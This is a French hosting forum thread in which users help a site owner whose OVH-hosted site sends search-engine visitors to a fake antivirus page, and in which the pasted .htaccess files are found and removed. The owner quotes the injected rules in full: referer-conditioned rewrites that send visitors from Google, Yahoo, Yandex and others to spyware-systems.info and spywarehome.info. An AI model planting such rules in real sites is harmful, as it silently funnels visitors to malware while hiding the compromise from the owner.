 |
||
| ||
| |||||
FORUM HardWare.fr
Réseaux grand public / SoHo
Hébergement
Google renvoie mon site vers un antivirus chinois ! (pb résolu)| Dernière réponse | |
|---|---|
| Sujet : Google renvoie mon site vers un antivirus chinois ! (pb résolu) | |
| toum_toum | Oui je sais pour Firefox (Ordi/système de ma copine :o )
Mots de passe : juste 8 (c'est le maxi possible chez OVH) |
| Aperçu |
|---|
| Vue Rapide de la discussion |
|---|
| toum_toum | Oui je sais pour Firefox (Ordi/système de ma copine :o )
Mots de passe : juste 8 (c'est le maxi possible chez OVH) |
| le pote | Ton site redirigé affichait ça sous Firefox, je sais pas si t'avais remarqué:
http://hfr-rehost.net/http://self/ [...] 0a8338.png Bonjour le déficit d'image... [:polionamen] Sinon t'as mis des mots de passe costauds hein (8 caractères mini, aléatoires, de type Dgo4bXpL, n'est-ce pas ? |
| aideinfo | Il est possible qu'ils aient découvert ce problème sur tes identifiants en consultant les logs Apache.
A mon avis, ils n'ont pas de dossier client. C'est un support, non une hotline. Le .htaccess était peut-être déjà là, mais pas avec ces directives ! Probablement vide ou là pour interdire le listage des dossiers, des choses comme ça. |
| toum_toum |
|
| Ruliane |
C'est moi qui n'ai pas été très malin sur ce coup-là. :pfff: |
| Ruliane |
Pourtant à leur place j'aurais pas trop envie que l'affaire s'ébruite, je résoudrais ça au plus vite.
|
| toum_toum | Oui mais justement ce n'est pas par l'infiltration de ces fichiers que le piratage a été fait (car vraiment il me semble qu'ils étaient présents dès le départ - je peux me tromper, mais...) ? |
| aideinfo | Le mieux est de protéger ton espace (notamment tes .php) par des .htaccess. |
| toum_toum |
Le "courant" est rétabli ! [:cerveau charlest] PS au post du dessus : pas faux. Mais il me semble que ces fichiers étaient présents lors de l'achat de mon espace chez OVH. J'avais été "piraté" en juin dernier et ils me l'avaient signalé, en me demandant de changer mes paramètres, rien de plus. Par contre il n'ont rien vérifié quand aux fichiers sur mon espace. Je pense que c'est là que tout s'est passé... (PS : ils ont été très nuls sur cette histoire. Dans 1 an - délai de mes hébergements, je migre tout le monde chez un voisin... :o ) Je vous remercie tous pour votre coup de main, j'y serais encore dans 15 jours sans vous... :jap: |
| Misssardonik | Mais après faudra trouver comment c'est arrivé, sinon dans 2 jours ça se représentera... |
| toum_toum | Ok chef :jap: |
| aideinfo | Tu supprimes les 2 .htaccess. |
| toum_toum | Il est donc bien là.. le pirate... ;)
Je dois en faire quoi ? Le supprimer, ou le vider ? Ou autre.. ? |
| toum_toum | Les résultats :
htacess de cgi-bin : RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ya.*$ [NC] RewriteRule .* http://www.spyware-systems.info/0/go.php?sid=2 [R,L] .htaccess (racine) RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ya.*$ [NC] RewriteRule .* http://spywarehome.info/0/go.php?sid=2 [R,L] .forward (racine) postmaster@monsite.fr |
| aideinfo | Tu rapatrie le .htaccess et le .forward sur ton disque par FTP et tu les ouvres par un éditeur texte.
Regarde aussi le .htaccess de cgi-bin. Il sert sans doute à protéger le contenu, mais on ne sait jamais. Les 3 autres fichiers servent au FTP et sont générés automatiquement : .bash_logout .bash_profile .bashrc
|
| toum_toum | Au fait, encore une preuve du "sérieux" du SAV OVH : Je leur ai dit il y a 2 jours que j'avais vidé le site. Du coup ils m'ont répondu que le site étant vidé et le probleme demeurant, c'est bien une preuve qu'ils ne sont pas responsables du problème...
Or le site est plein de fichiers de toutes sortes en fait... Bref ils n'y ont jamais jeté le moindre petit coup d'oeil... :) Et l'ai-je déjà dit ? En juin ils m'avaient demandé de changer mes identifiants (ce que j'ai fait), car selon eux j'avais été "visité" (par je ne sais qui, je n'ai jamais eu d'autres explications malgré mes demandes...). Joli... |
| toum_toum | Le .htaccess, je dois faire comment pour voir ce qu'il y a dedans ? |
| Ruliane |
Ils l'ont jamais prise au sérieux l'affaire. Pourtant, c'est bien là le problème. Tu peux aller chez un autre hébergeur normalement, il faut juste transférer le nom de domaine.
Même comportement qu'avec le site.
|
| toum_toum | Donc : je croyais avoir fait le vide, mais me suis trompé. J'étais dans le rep www/ et non
à la racine. Bilan : j'ai un max de trucs sur le site. Voilà le listing complet : - un répertoire cgi-bin (avec un fichier .htaccess dedans) - 4 dossiers liés à mes 4 sous-domaines - un répertoire index_htm_files <- ca c'est lié à la créa de mon site. Répertoire "à part". - un répertoire requetes - un répertoire www (dont je viens de parler, celui qui recoit ma page index.html + le fichier robots que j'avais créé il y a 2 j) - Une série de fichiers "libres" qui sont : .bash_logout .bash_profile .bashrc .forward .htaccess + un fichier LISEZ-MOI + enfin la petite dizaine de fichiers de mon site que j'avais dû déjà mettre en ligne ici, par erreur... * En vert ce sont des fichiers ou rep que j'ai mis moi-même. Tous les autres me sont étrangers. |
| toum_toum | Oui tu as raison je suis en www/ en distant (car plusieurs noms de domaine regroupés sur 1 seul hébergement).
Je vérifie ça... |
| aideinfo | Tu as essayé de faire pointer le domaine vers un sous-dossier au cas où ? Affiches-tu bien les fichiers cachés ? Il est possible que ce soit dû à un .htaccess situé à la racine ! |
| toum_toum | Oui j'ai créé une page index.html , que j'ai mise en ligne
|
| aideinfo | Tu as placé la page que je t'ai demandée ? J'ai besoin de voir quelque chose.
Tu peux le transférer chez Gandi si tu veux, mais tu perds l'hébergement. |
| toum_toum |
|
| toum_toum |
|
| toum_toum |
2 jours après toujours mon site plombé (google ou yahoo). Tout cette @@@@@ traine depuis 2 mois et j'ai mon activité qui doit reprendre dans 5 jours. Je ne sais pas qui je vais étriper en premier... |
| Ruliane | Peut-être, mais ce n'est pas vraiment la question. Pour le principe, ce serait bien qu'OVH s'occupe un peu de son hébergement. |
| le pote | C'est une histoire de fous !
T'aurais pas plus vite fait de changer d'hébergeur ? |
| aideinfo | Mets une page index.html ne contenant que le mot test. |
| Ruliane |
|
| Misssardonik | Le referer, c'est un paramètre qui est contenu dans une requête HTTP (requête que tu fais quand tu demandes une page, quoi), et qui indique de quel site vient l'utilisateur. Normalement, si l'utilisateur a rentré l'adresse du site directement dans son navigateur, le referer est vide, s'il a cliqué sur un lien suite à une recherche google ce sera google, etc. Cela n'a donc en réalité rien à voir avec google ou yahoo : c'est une information que l'utilisateur envoit au site qu'il visite. |
| toum_toum |
Bon, voilà ce que je viens de faire : 1. J'ai créé un petit fichier sous word (au format txt) intitulé robots.txt Avec ça comme infos : User-agent: * Disallow: / 2. J'ai mis le fichier en ligne, à la racine du site 3. J'attends 3-4 j, et je remets en ligne le site en entier. Qu'en pensez-vous ? Mes sources : http://www.google.com/support/webm [...] wer=156412 http://www.google.com/support/webm [...] wer=156449 |
